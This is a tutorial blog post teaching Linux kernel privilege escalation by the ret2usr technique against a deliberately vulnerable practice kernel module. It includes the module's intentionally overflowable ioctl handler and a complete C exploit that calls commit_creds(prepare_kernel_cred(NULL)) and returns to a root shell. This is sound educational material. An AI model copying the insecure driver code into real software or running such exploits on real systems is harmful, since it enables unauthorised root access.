Linux Kernel Exploitation - ret2usr
The goal in userland exploitation is to gain code execution and trick the process to spawn a shell. In kernelland exploitation the main goal is to change the privileges of the current process.
The next section shows an easy vulnerability in a custom kernel module, which is a stack-based bufferoverlow, and desribes how to exploit that vulnerability.
Note No exploit mitigations like KASLR, PTI, SMEP or SMAP are in place. All those mitigations and how to exploit them will be explained in following posts.
prerequisite
Here can description be found on how to build the debugging environment: Linux Kernel Exploitation - Environment. That environment is used in this example. The init script should be modified to start a shell with root privileges, during the development process.
#!/bin/sh
for i in `find ".ko" /modules`
do
        insmod $i
done
mount -t proc none /proc
mount -t sysfs none /sys
mdev -s
chmod 666 /dev/stack_bof
exec /bin/sh
#setuidgid 1000 /bin/sh
If the exploit is finished, the init script should be changed to started the shell with less permissions.
#!/bin/sh
for i in `find ".ko" /modules`
do
        insmod $i
done
mount -t proc none /proc
mount -t sysfs none /sys
mdev -s
chmod 666 /dev/stack_bof
#exec /bin/sh
setuidgid 1000 /bin/sh
vulnerability
The following excerpt shows the source code of the kernel module what is used in this blogpost to demonstrate the exploitation approach:
#include <linux/compiler.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/module.h>
#include <linux/uaccess.h>
MODULE_DESCRIPTION("vuln1");
MODULE_AUTHOR("sash");
MODULE_LICENSE("GPL");
#define IOCTL_VULN1_WRITE 4141
static int vuln1_open(struct inode *inode, struct file *file)
{
	return 0;
}
static int vuln1_release(struct inode *inodep, struct file *filp)
{
	return 0;
}
static noinline int vuln1_do_breakstuff(unsigned long addr)
{
	char buffer[256];
	volatile int size = 512;
	return _copy_from_user(&buffer, (void __user *)addr, size);
}
static long vuln1_ioctl(struct file *fd, unsigned int cmd, unsigned long value)
{
	long to_return;
	switch (cmd) {
		case IOCTL_VULN1_WRITE:
			to_return = vuln1_do_breakstuff(value);
			break;
		default:
			to_return = -EINVAL;
			break;
	}
	return to_return;
}
static const struct file_operations vuln1_file_ops = {
	.owner		= THIS_MODULE,
	.open		= vuln1_open,
	.unlocked_ioctl = vuln1_ioctl,
	.release	= vuln1_release,
	.llseek 	= no_llseek,
};
struct miscdevice vuln1_device = {
	.minor	= MISC_DYNAMIC_MINOR,
	.name	= "vuln",
	.fops	= &vuln1_file_ops,
	.mode	= 0666,
};
module_misc_device(vuln1_device);
The function vuln1_ioctl is called when the ioctl system call is used. The modules provides one action (IOCTL_VULN1_WRITE) for the system call which calls internally vuln1_do_breakstuff. The function vuln1_do_breakstuff has a very obvious vulnerability. It reads 512 bytes from userspace into a buffer of 256 bytes. The function calls _copy_from_user instead of copy_from_user in order to prevent the implemented security checks mitigate the buffer overflow.
Note In order to compile the kernel module, the explanation here can be used. If that is not an option, all resourcen can be downloaded from here.
The module creates the miscellaneous device /dev/vuln which can be opened with open and accessed with ioctl() syscall.
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#define IOCTL_VULN1_WRITE 4141
void ioctl_write(int fd){
	char buffer[512];
	memset(buffer, 0x41, sizeof(buffer));
	ioctl(fd, IOCTL_VULN1_WRITE, &buffer);
}
void main()
{
  int fd;
  fd = open("/dev/vuln", 0);
  if (fd < 0) {
    printf ("Cannot open device file");
    exit(-1);
  }
  ioctl_write(fd);
  close(fd);
}
The device is opened in the main function. The function ioctl write shows how to write data to the device using the ioctl syscall with the IOCTL_VULN1_WRITE command.
approach
As mentioned before, in userland exploitation usually the exploit jumps to a shellcode that pops a shell. In kernelland, the ret2usr approach is the simples kernelland approach which does not jump to a real shellcode, but jumps to kernelland functions to change the privileges to root and at the end back to userland.
In this example the most common approach is used:
- Obtain rootprivileges
- Restore user context and switch to userland and to a provided function pointer
1. obtain root privileges
The common approach to obtain root privileges is to call prepare_kernel_cred and commit_creds. The following part explains what the function does and why does it make sense to use those functions in the exploit.
In the kernel every task (known as process in Userland) is represented by a task_struct structure. That structure holds all information about a task. One information that is stored in that struct, is the information about the credentials of the task. That is stored in the struct struct cred and referenced by the pointer struct cred *cred that is part of task_struct.
struct task_struct {
#ifdef CONFIG_THREAD_INFO_IN_TASK
	/*
	 * For reasons of header soup (see current_thread_info()), this
	 * must be the first element of task_struct.
	 */
	struct thread_info		thread_info;
#endif
	/* -1 unrunnable, 0 runnable, >0 stopped: */
	volatile long			state;
	/*
	 * This begins the randomizable portion of task_struct. Only
	 * scheduling-critical items should be added above here.
	 */
	randomized_struct_fields_start
	void				*stack;
	refcount_t			usage;
	/* Per task flags (PF_*), defined further below: */
	unsigned int			flags;
	unsigned int			ptrace;
[...]
	/* Process credentials: */
	/* Tracer's credentials at attach: */
	const struct cred __rcu		*ptracer_cred;
	/* Objective and real subjective task credentials (COW): */
	const struct cred __rcu		*real_cred;
	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;
[...]
};
As the following excerpt shows, the struct cred contains all IDs like uid, gid, euid and so on.
struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key	*session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct ucounts *ucounts;
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	/* RCU deletion */
	union {
		int non_rcu;			/* Can we skip RCU deletion? */
		struct rcu_head	rcu;		/* RCU deletion hook */
	};
} __randomize_layout;
The function prepare_kernel_cred returns a reference to a struct cred.
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
	const struct cred *old;
	struct cred *new;
	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
	if (!new)
		return NULL;
	kdebug("prepare_kernel_cred() alloc %p", new);
	if (daemon)
		old = get_task_cred(daemon);
	else
		old = get_cred(&init_cred);
	validate_creds(old);
	*new = *old;
	new->non_rcu = 0;
	atomic_set(&new->usage, 1);
	set_cred_subscribers(new, 0);
	get_uid(new->user);
	get_user_ns(new->user_ns);
	get_group_info(new->group_info);
#ifdef CONFIG_KEYS
	new->session_keyring = NULL;
	new->process_keyring = NULL;
	new->thread_keyring = NULL;
	new->request_key_auth = NULL;
	new->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
#endif
#ifdef CONFIG_SECURITY
	new->security = NULL;
#endif
	new->ucounts = get_ucounts(new->ucounts);
	if (!new->ucounts)
		goto error;
	if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
		goto error;
	put_cred(old);
	validate_creds(new);
	return new;
error:
	put_cred(new);
	put_cred(old);
	return NULL;
}
EXPORT_SYMBOL(prepare_kernel_cred);
The function expects an argument which is a pointer to a struct task_struct, but it can be null. If the argument is not null, it is used to read the credentials (struct cred) from that task. If the argument is null, a reference to init_cred is used. init_cred is a prepared struct cred that is used for the initial task and represents root.
struct cred init_cred = {
	.usage			= ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
	.subscribers	= ATOMIC_INIT(2),
	.magic			= CRED_MAGIC,
#endif
	.uid			= GLOBAL_ROOT_UID,
	.gid			= GLOBAL_ROOT_GID,
	.suid			= GLOBAL_ROOT_UID,
	.sgid			= GLOBAL_ROOT_GID,
	.euid			= GLOBAL_ROOT_UID,
	.egid			= GLOBAL_ROOT_GID,
	.fsuid			= GLOBAL_ROOT_UID,
	.fsgid			= GLOBAL_ROOT_GID,
	.securebits		= SECUREBITS_DEFAULT,
	.cap_inheritable	= CAP_EMPTY_SET,
	.cap_permitted		= CAP_FULL_SET,
	.cap_effective		= CAP_FULL_SET,
	.cap_bset		= CAP_FULL_SET,
	.user			= INIT_USER,
	.user_ns		= &init_user_ns,
	.group_info		= &init_groups,
	.ucounts		= &init_ucounts,
};
That means, if the function is called that way prepare_kernel_cred(null), it returns a reference to a struct cred structure with root permission. In order to assign those new credentials, the function commit_creds needs to be used. That function excepts the new credentials as argument and assign those to the current task. 
In order to accomplish setting root privileges to the current task, it is enough to perform a such a call commit_creds(perpare_kernel_creds(null));.
2. restore user context and switch to userland
The last step of the exploit execution is to jump to a function located in userland. If the exploits jumps to the userland function immediately after obtaining root privileges, all important registers like RSP, RFLAGS, or the segemnt registers CS and SS points still to kernelland. Those segments and even the stack are not accessible from userland. Therefore, is has to be restored by the exploit manually. In order to accomplish that, the user context (all necessary registers) have to be stored before switching to kernelland (ioctl call).
unsigned long u_cs;
unsigned long u_ss;
unsigned long u_rsp;
unsigned long u_rflags;
unsigned long u_rip;
void save_state() {
    __asm__(
        ".intel_syntax noprefix;"
        "mov u_cs, cs;"
        "mov u_ss, ss;"
        "mov u_rsp, rsp;"
        "pushf;"
        "pop u_rflags;"
        ".att_syntax;"
        );
    u_rip = (unsigned long)&start_sh;
}
The current RIP is not stored. After the priviledge escalation it makes sense to call a function that executes everything which should be executed with higher privileges. In this example a function is used that starts a shell.
void start_sh() {
    char *args[] = {"/bin/sh", "-i", NULL};
    execve("/bin/sh", args, NULL);
}
The GS register does not need to be saved due to the possiblity to restore it with the swapgs instruction. swapgs is a privileged instruction and swaps the gs register from kernelland to userland and vice versa.
Since all necessary values are stored, those can be restored after the call to commit_creds.
void restore_state() {
        __asm__(
            ".intel_syntax noprefix;"
            "swapgs;""push u_ss;"     // restore gs reg and push all
            "push u_rsp;"             // other values to the stack
            "push u_rflags;"
            "push u_cs;"
            "push u_rip;"             // points to start_sh 
            "iretq;"                     
            ".att_syntax;"
            );
}
All stored values are push onto the stack, because they are restored by the iretq instruction automatically. That instruction is a return from a system call, so similar to ret for a function call. Due to the iretq call, it returns from the system call and switch back to userland. Since the stored user_rip points to start_sh, the function will be executed after the return.
exploit
Now put everything together for a working exploit.
- Find the address of commit_credsandprepare_kernel_cred
- Save user state
- Overflow the buffer and overwrite the return address with a function that does:
- Call commit_creds(prepare_kernel_cred(null))
- Restore user state and call iretq
All necessary functions are shown above. The only things what are missing, the addresses of the commit_creds and prepare_kernel_cred functions, and the offset from the beginning of the buffer to the return address are needed.
The addresses of the functions can be found in several ways:
- Looking for the addreses in /proc/kallsyms
- Printing the addresses in gdb
To read the kernel symbols from /proc/kallsyms root permissions are necessary.
# cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff810d2950 T prepare_kernel_cred
# cat /proc/kallsyms | grep commit_creds
ffffffff810d26f0 T commit_creds
The offset can easily be read from the disassembly of the function:
			;-- vuln1_do_breakstuff:
            ; CALL XREF from sub.vuln1_ioctl_80000f0 @ 0x8000104(x)
┌ 50: sub.vuln1_do_breakstuff_80000b0 ();
│           ; var int64_t var_100h @ rbp-0x100
│           ; var int64_t var_104h @ rbp-0x104
│           0x080000b0      e800000000     call __fentry__             ; RELOC 32 __fentry__
│           ; CALL XREF from sub.vuln1_do_breakstuff_80000b0 @ 0x80000b0(x)
│           0x080000b5      55             push rbp
│           0x080000b6      4889fe         mov rsi, rdi
│           0x080000b9      4889e5         mov rbp, rsp
│           0x080000bc      4881ec0801..   sub rsp, 0x108
│           0x080000c3      c785fcfeff..   mov dword [var_104h], 0x200 ; 512
│           0x080000cd      486395fcfe..   movsxd rdx, dword [var_104h]
│           0x080000d4      488dbd00ff..   lea rdi, [var_100h]
│           0x080000db      e800000000     call _copy_from_user        ; RELOC 32 _copy_from_user
│           ; CALL XREF from sub.vuln1_do_breakstuff_80000b0 @ 0x80000db(x)
│           0x080000e0      c9             leave
└           0x080000e1      c3             ret
At offset 0x080000d4 the address of the buffer is moved into RDI as the first argument of the function call _copy_from_user. So the buffer is addressed with RBP-0x100. That means, the offset to RBP is 0x100. RBP points the the saved framepointer. The value right after the saved framepointer is the return address, which means, that the offset from the beginning of the buffer to the return address it 0x108.
The following excerpt shows the exploit:
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#define IOCTL_VULN1_WRITE 4141
#define COMMIT_CREDS_ADDRESS 0xffffffff810d26f0ul
#define PREPARE_KERNEL_CRED_ADDRESS 0xffffffff810d2950ul
typedef int (* t_commit_creds)(void *);
typedef void *(* t_prepare_kernel_cred)(void *);
t_commit_creds commit_creds = (t_commit_creds)COMMIT_CREDS_ADDRESS;
t_prepare_kernel_cred prepare_kernel_cred = (t_prepare_kernel_cred)PREPARE_KERNEL_CRED_ADDRESS;
unsigned long u_cs;
unsigned long u_ss;
unsigned long u_rsp;
unsigned long u_rflags;
unsigned long u_rip;
void start_sh() {
    char *args[] = {"/bin/sh", "-i", NULL};
    execve("/bin/sh", args, NULL);
}
void save_state() {
    __asm__(
        ".intel_syntax noprefix;"
        "mov u_cs, cs;"
        "mov u_ss, ss;"
        "mov u_rsp, rsp;"
        "pushf;"
        "pop u_rflags;"
        ".att_syntax;"
        );
    u_rip = (unsigned long)&start_sh;
}
void restore_state() {
        __asm__(
            ".intel_syntax noprefix;"
            "swapgs;""push u_ss;"     // restore gs reg and push all
            "push u_rsp;"             // other values to the stack
            "push u_rflags;"
            "push u_cs;"
            "push u_rip;"             // points to start_sh
            "iretq;"
            ".att_syntax;"
            );
}
void exploit(){
  commit_creds(prepare_kernel_cred(NULL));
  restore_state();
}
void ioctl_write(int fd){
  char buffer[512];
  memset(buffer, 0x41, sizeof(buffer));
  // overwrite return address
  *(unsigned long *)&buffer[0x108] = (unsigned long) &exploit;
  //save user state
  save_state();
  
  // ioctl syscall
  ioctl(fd, IOCTL_VULN1_WRITE, &buffer);
}
void main()
{
  int fd;
  // open the device
  fd = open("/dev/vuln1", 0);
  if (fd < 0) {
    printf ("Cannot open device file");
    exit(-1);
  }
  ioctl_write(fd);
  close(fd);
}
The exploit needed to be statically compiled with gcc -static vuln1_exploit.c -o vuln1_exploit and then put into the initramfs file.
Furthermore, chmod 666 /dev/vuln should be added to the init script in order to ensure that the device can be accessed by a normal user.
All materials can be found on https://github.com/sashs/linux_kernel_exploitation.
resources
- ioctl - https://docs.kernel.org/driver-api/ioctl.html
- Writing misc device drivers - https://embetronicx.com/tutorials/linux/device-drivers/misc-device-driver/
- module_misc_device - https://elixir.bootlin.com/linux/v5.13.19/source/include/linux/miscdevice.h#L105
- https://elixir.bootlin.com/linux/v5.13.19/source/include/linux/sched.h#L657
- https://elixir.bootlin.com/linux/v5.13.19/source/kernel/cred.c#L449
- https://elixir.bootlin.com/linux/v5.13.19/source/include/linux/cred.h#L110
- https://elixir.bootlin.com/linux/v5.13.19/source/kernel/cred.c#L719
- https://elixir.bootlin.com/linux/v5.13.19/source/kernel/cred.c#L41
- swapgs - https://www.kernel.org/doc/Documentation/x86/entry_64.txt
